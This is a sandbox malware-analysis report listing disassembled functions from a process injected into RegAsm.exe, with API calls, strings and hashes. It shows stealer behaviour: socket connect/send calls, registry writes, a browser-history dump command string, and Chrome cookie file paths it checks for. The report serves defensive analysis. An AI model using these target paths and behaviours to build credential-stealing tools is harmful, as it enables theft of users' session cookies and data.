                                                                                                                                                                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                                                                                  • _free.LIBCMT ref: 00444118
                                                                                                                                                                                                  • _free.LIBCMT ref: 0044412B
                                                                                                                                                                                                  • _free.LIBCMT ref: 0044413C
                                                                                                                                                                                                  • _free.LIBCMT ref: 0044414D
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                  • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                                                                                                                                                  • Instruction ID: 0e9c2896d1a2baf17e4b980eca3efa8a556ca0a6e45d827b59e8921ed08f8926
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 91F03AB18025208FA731AF2DBD528053BA1A705720356853BF40C62A71C7B849C2DFDF
                                                                                                                                                                                                  Function 0044BAB7 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: t'`/
                                                                                                                                                                                                  • API String ID: 0-2084328917
                                                                                                                                                                                                  • Opcode ID: 5e00ae4c16f04a5a408ad6ef1dd4f82ff0aaed16414488ba1079334ecebbb015
                                                                                                                                                                                                  • Instruction ID: da8fb74aa53f7b39327717419ea6793f6800af9799f3d5c2cf6102f7e15971fb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e00ae4c16f04a5a408ad6ef1dd4f82ff0aaed16414488ba1079334ecebbb015
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1451C171D00209AAEF109FA5D885BAFBBB8EF45314F14015FE905A7291CB38D911CBA9
                                                                                                                                                                                                  Function 00409EDE Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 157COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetKeyboardLayoutNameA.USER32(?), ref: 00409F0E
                                                                                                                                                                                                    • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,021C4988,00000010), ref: 004048E0
                                                                                                                                                                                                    • Part of subcall function 0041C5A6: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041C5BB
                                                                                                                                                                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CreateFileKeyboardLayoutNameconnectsend
                                                                                                                                                                                                  • String ID: XQG$NG$PG
                                                                                                                                                                                                  • API String ID: 1634807452-3565412412
                                                                                                                                                                                                  • Opcode ID: 24d1b81352f2547fa77c554ed12819fcaf45bb034c36d1f1b2d86084d4bb2f97
                                                                                                                                                                                                  • Instruction ID: 86122f73fea86c9dce3a8c8dcd7d10d1556e7c038dfd98f63e082762e027ad1b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 24d1b81352f2547fa77c554ed12819fcaf45bb034c36d1f1b2d86084d4bb2f97
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 955120315082419BC328FB32D851AEFB3E5AFD4348F50493FF54AA71E2EF78594A8649
                                                                                                                                                                                                  Function 00452EF4 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 150COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • _free.LIBCMT ref: 00453009
                                                                                                                                                                                                    • Part of subcall function 00452DF9: __alloca_probe_16.LIBCMT ref: 00452E62
                                                                                                                                                                                                    • Part of subcall function 00452DF9: WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,?,00001004,00000000,00000000,?,00000080,00000000,00000000,?,00000080,00000000,00000000), ref: 00452EBF
                                                                                                                                                                                                    • Part of subcall function 00452DF9: __freea.LIBCMT ref: 00452EC8
                                                                                                                                                                                                  • _free.LIBCMT ref: 00452F5F
                                                                                                                                                                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                                                                                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00452F9A
                                                                                                                                                                                                    • Part of subcall function 00445B74: HeapAlloc.KERNEL32(00000008,?,00000000,?,0044834A,00000001,00000364,?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000), ref: 00445BB5
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorHeapLast_free$AllocByteCharFreeMultiWide__alloca_probe_16__freea
                                                                                                                                                                                                  • String ID: t'`/
                                                                                                                                                                                                  • API String ID: 1317440246-2084328917
                                                                                                                                                                                                  • Opcode ID: 6f7d6b8a41de1fbed53486ea7b03a8913d460fbbb43c153e705b8e5521843823
                                                                                                                                                                                                  • Instruction ID: b42996e4f32b2ce3557a5317cf724a2d3ce4ed36614ed27229f3ff0ed108fdae
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f7d6b8a41de1fbed53486ea7b03a8913d460fbbb43c153e705b8e5521843823
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9441D571800225ABDF319F258C41FAB7BB8EF05756F00419BFD08E6296EA36CE44DB65
                                                                                                                                                                                                  Function 10004BDD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 10004C1D
                                                                                                                                                                                                  • _free.LIBCMT ref: 10004CE8
                                                                                                                                                                                                  • _free.LIBCMT ref: 10004CF2
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _free$FileModuleName
                                                                                                                                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                  • API String ID: 2506810119-1068371695
                                                                                                                                                                                                  • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                                                                                                                                  • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                                                                                                                                  • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                                                                                                                                                                                                  Function 004434D5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00443515
                                                                                                                                                                                                  • _free.LIBCMT ref: 004435E0
                                                                                                                                                                                                  • _free.LIBCMT ref: 004435EA
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _free$FileModuleName
                                                                                                                                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                  • API String ID: 2506810119-1068371695
                                                                                                                                                                                                  • Opcode ID: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                                                                                                                                                                  • Instruction ID: e5efe6401a3e5f1db0e1141fbbc5a3d1caea7301f6195c2e8eaff0a3f5655f7e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D63193B1A00254BFEB21DF9A998199EBBF8EB84B15F10406BF40597311D6B88F41CB99
                                                                                                                                                                                                  Function 0044B89F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101fileCOMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,FF8BC35D,00000000,?,?,0044BBFE,?,00000000,FF8BC35D), ref: 0044B952
                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0044B980
                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0044BBFE,?,00000000,FF8BC35D,00000000,00000000,FF8BC369,00000000,0043CED4,?,?,?,83EC8B55,?,458B2CEC), ref: 0044B9B1
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                                                                                                                                  • String ID: t'`/
                                                                                                                                                                                                  • API String ID: 2456169464-2084328917
                                                                                                                                                                                                  • Opcode ID: 61a1eb95f210c0310294f4f1a604aaa858dc35aa92d75ae144fe4a4ae54a0673
                                                                                                                                                                                                  • Instruction ID: 31ac96f82a5847659344ef20b41dc67af7a50504b34fbd786f6314a6cc22fa3b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 61a1eb95f210c0310294f4f1a604aaa858dc35aa92d75ae144fe4a4ae54a0673
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B13161B5A102199FDB14CF59DD819EAB7B9FB08305F0444BEE90AD7251D734ED80CBA4
                                                                                                                                                                                                  Function 00452DF9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00452E62
                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,?,00001004,00000000,00000000,?,00000080,00000000,00000000,?,00000080,00000000,00000000), ref: 00452EBF
                                                                                                                                                                                                  • __freea.LIBCMT ref: 00452EC8
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ByteCharMultiWide__alloca_probe_16__freea
                                                                                                                                                                                                  • String ID: t'`/
                                                                                                                                                                                                  • API String ID: 3062693170-2084328917
                                                                                                                                                                                                  • Opcode ID: 571e35960802651425c405c60af804956b57107d641c5bd2d20fb3eb238341ad
                                                                                                                                                                                                  • Instruction ID: 547a5762545d9e1961a78ac081f297de34cc2a53ea43b9f31110d22f3e4d4f85
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 571e35960802651425c405c60af804956b57107d641c5bd2d20fb3eb238341ad
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 81312532A00156ABDB249FA5CD42CAF7BA4EB45715F08466AFC14EB282DB38CC44C794
                                                                                                                                                                                                  Function 0040404C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93sleepCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                                                                                                                                                                    • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,63841986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                                                                                                                                                                    • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5), ref: 004185B9
                                                                                                                                                                                                    • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84), ref: 004185C2
                                                                                                                                                                                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                                                                                                                                  • Sleep.KERNEL32(000000FA,00465E84), ref: 00404138
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                                                                                                                  • String ID: /sort "Visit Time" /stext "$0NG
                                                                                                                                                                                                  • API String ID: 368326130-3219657780
                                                                                                                                                                                                  • Opcode ID: 87d770fe459356d938983b865b1cd302a3835d7c71cdc7891b93df328c2921e7
                                                                                                                                                                                                  • Instruction ID: 7a7c83aa22bf4ff3424ba87d95d637a61540eed1193ecfb54830ab602693969f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 87d770fe459356d938983b865b1cd302a3835d7c71cdc7891b93df328c2921e7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2C316371A0011956CB15FBA6DC569ED7375AF90308F00007FF60AB71E2EF785D49CA99
                                                                                                                                                                                                  Function 00449540 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • _free.LIBCMT ref: 004495B3
                                                                                                                                                                                                  • _free.LIBCMT ref: 00449609
                                                                                                                                                                                                    • Part of subcall function 004493E5: _free.LIBCMT ref: 0044943D
                                                                                                                                                                                                    • Part of subcall function 004493E5: GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                                                                                                                                                                    • Part of subcall function 004493E5: WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                                                                                                                                                                    • Part of subcall function 004493E5: WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                                                                                                  • String ID: t'`/
                                                                                                                                                                                                  • API String ID: 314583886-2084328917
                                                                                                                                                                                                  • Opcode ID: 7819fab580251a6413c46e3f0ee07f889e2528e1cdd5ac1c69f544e85ace0940
                                                                                                                                                                                                  • Instruction ID: da5c51787f9f1a1f19b75189942e14dcbf4476fdba08df6e704f400b95fb1742
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7819fab580251a6413c46e3f0ee07f889e2528e1cdd5ac1c69f544e85ace0940
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6D21517380011577FF31B7259C81DEB7368DB45724F21029BF898A3181EB784EC19A9D
                                                                                                                                                                                                  Function 0041631F Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00416330
                                                                                                                                                                                                    • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                                                                                                                                                    • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                                                                                                                                                                                                    • Part of subcall function 004138B2: RegCloseKey.KERNEL32(004660B4), ref: 004138E6
                                                                                                                                                                                                    • Part of subcall function 00409E1F: _wcslen.LIBCMT ref: 00409E38
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _wcslen$CloseCreateValue
                                                                                                                                                                                                  • String ID: !D@$okmode$PG
                                                                                                                                                                                                  • API String ID: 3411444782-3370592832
                                                                                                                                                                                                  • Opcode ID: 85a472a8ed9fba8d48a13707545644fa305d45b1f9b2fecff8dfdaf9ddb1d636
                                                                                                                                                                                                  • Instruction ID: 097cdf197a66b89fefcd85ce8a19d7acc75244c7017ebd4eb32b8c3ef24b572d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 85a472a8ed9fba8d48a13707545644fa305d45b1f9b2fecff8dfdaf9ddb1d636
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E11A571B442011BDA187B32D862BBD22969F84348F80843FF546AF2E2DFBD4C51975D
                                                                                                                                                                                                  Function 0040C627 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000), ref: 0040C531
                                                                                                                                                                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
                                                                                                                                                                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6C3
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • User Data\Profile ?\Network\Cookies, xrefs: 0040C670
                                                                                                                                                                                                  • User Data\Default\Network\Cookies, xrefs: 0040C63E
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ExistsFilePath
                                                                                                                                                                                                  • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                                                                                                                                  • API String ID: 1174141254-1980882731
                                                                                                                                                                                                  • Opcode ID: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                                                                                                                                                                                                  • Instruction ID: a3c4a2fc075df05cc4efb8d324c4514c6f5a9a9113215be8183f294a60e8cc46
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0621E27190011A96CB14FBA2DC96DEEBB7CAE50319B40053FF506B31D2EF789946C6D8
                                                                                                                                                                                                  Function 0040C6F6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0040C561: PathFileExistsW.SHLWAPI(00000000), ref: 0040C594
                                                                                                                                                                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C727
                                                                                                                                                                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C792
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • User Data\Profile ?\Network\Cookies, xrefs: 0040C73F
                                                                                                                                                                                                  • User Data\Default\Network\Cookies, xrefs: 0040C70D
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ExistsFilePath
                                                                                                                                                                                                  • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                                                                                                                                  • API String ID: 1174141254-1980882731
                                                                                                                                                                                                  • Opcode ID: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                                                                                                                                                                                                  • Instruction ID: 531025beeaae0c5c42121d483a56170e39db3028f8febaf9efde6b64dfa31b71
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4821127190011A96CB04F7A2DC96CEEBB78AE50359B40013FF506B31D2EF789946C6D8
                                                                                                                                                                                                  Function 0040B19F Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68timeCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                                                                                                                                                  • wsprintfW.USER32 ref: 0040B22E
                                                                                                                                                                                                    • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: EventLocalTimewsprintf
                                                                                                                                                                                                  • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                                                                                                                                                                                  • API String ID: 1497725170-1359877963
                                                                                                                                                                                                  • Opcode ID: 06c3bad099b03f5bfd1d77d0a6934743afda3855c33f854b134d7284dad7d650
                                                                                                                                                                                                  • Instruction ID: 4bcbbea8953a56f0834a7592719eb704c83d71ae81c48fe005db4fd1b538d991
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 06c3bad099b03f5bfd1d77d0a6934743afda3855c33f854b134d7284dad7d650
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88114272404118AACB19AB96EC55CFE77BCEE48315B00012FF506A61D1FF7C5A45C6AD
                                                                                                                                                                                                  Function 0040AF29 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
